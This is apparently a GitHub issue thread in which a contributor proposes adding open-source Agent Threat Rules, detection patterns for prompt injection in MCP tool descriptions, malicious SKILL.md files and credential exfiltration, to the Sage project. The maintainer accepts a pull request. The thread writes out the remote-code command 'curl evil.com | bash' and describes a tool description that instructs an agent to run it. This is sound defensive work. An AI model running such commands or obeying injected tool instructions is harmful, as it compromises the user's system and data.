ATR agent-layer threat rules — 108 rules for MCP/SKILL.md threats (shipped in Cisco AI Defense)

[eeee2345]

Hi Sage team,

ATR (Agent Threat Rules) maintains 108 open-source detection rules focused on AI agent-layer threats — prompt injection via tool descriptions, malicious SKILL.md files, credential exfiltration through MCP responses, and supply chain attacks on skill registries. Same rules that Cisco AI Defense ships in production (cisco-ai-defense/skill-scanner#79).

Sage's existing 313 rules cover OS/command-layer threats excellently. ATR rules cover the agent protocol layer that sits above — threats that arrive through MCP tool descriptions and SKILL.md files before they become OS commands.

Example gap ATR fills: Sage catches curl evil.com | bash (command layer). ATR catches the MCP tool description that instructs the agent to run curl evil.com | bash — before the command is ever generated.

What ATR covers (not in Sage today):

• Prompt injection in tool descriptions (10 patterns)
• Malicious SKILL.md content (10 patterns)
• Hidden LLM instructions in MCP responses (10 patterns)
• Credential exfiltration via agent context (10 patterns)
• Fork impersonation / typosquatting skills (10 patterns)
• Agent manipulation / social engineering (10 patterns)
• 7 more categories (87 total high-confidence patterns)

Tested on: 53,577 real-world MCP skills, 0% FP on clean content.

Questions before we submit a PR:

1. Would ATR patterns fit in existing threats/ files (e.g. a new agent-threats.yaml) or a separate directory?
2. ATR rules use match_on: content — does that align with Sage's content matching?
3. Our rules are MIT licensed. Your threats/ dir uses DRL-1.1. Should we relicense contributed patterns to DRL-1.1?

Happy to convert ATR patterns to your exact YAML schema. We use a very similar format already.

• Website: https://agentthreatrule.org
• Rules: https://github.com/Agent-Threat-Rule/agent-threat-rules
• Cisco integration: feat: Add ATR community rule pack — 34 rules for MCP tool poisoning, multi-agent attacks, and advanced injection cisco-ai-defense/skill-scanner#79

[vaclavbelak]

Hi Adamthereal (@eeee2345) ! This is awesome, sure, please feel free to submit a PR against the pre-release branch with the rules under the MIT license. Looking forward! Sorry for the delayed response, we had to discuss internally the implications.

[eeee2345]

Hi Vaclav Belak (@vaclavbelak) — PR submitted: #33 (supersedes #32 which I've closed; earlier iteration that shipped before the full validation loop).

Highlights for your review:

• 17 rules, threats/agent-layer.yaml, MIT header per your comment above.
• Uses your CLT-* ID prefix convention (CLT-PI / CLT-MCP / CLT-SKL / CLT-CTX).
• 0 FP on a 432-sample real-world benign skill corpus + all 1521 Sage tests still pass with the file in place.
• I flagged licensing explicitly in the PR body — happy to relicense to DRL-1.1 if that's cleaner.
• Also offered pre-trimmed subsets (block-only 8 / critical-only 10 / skill-layer-only 8) if 17 is too large for a first external contribution.

Looking forward to your feedback whenever convenient.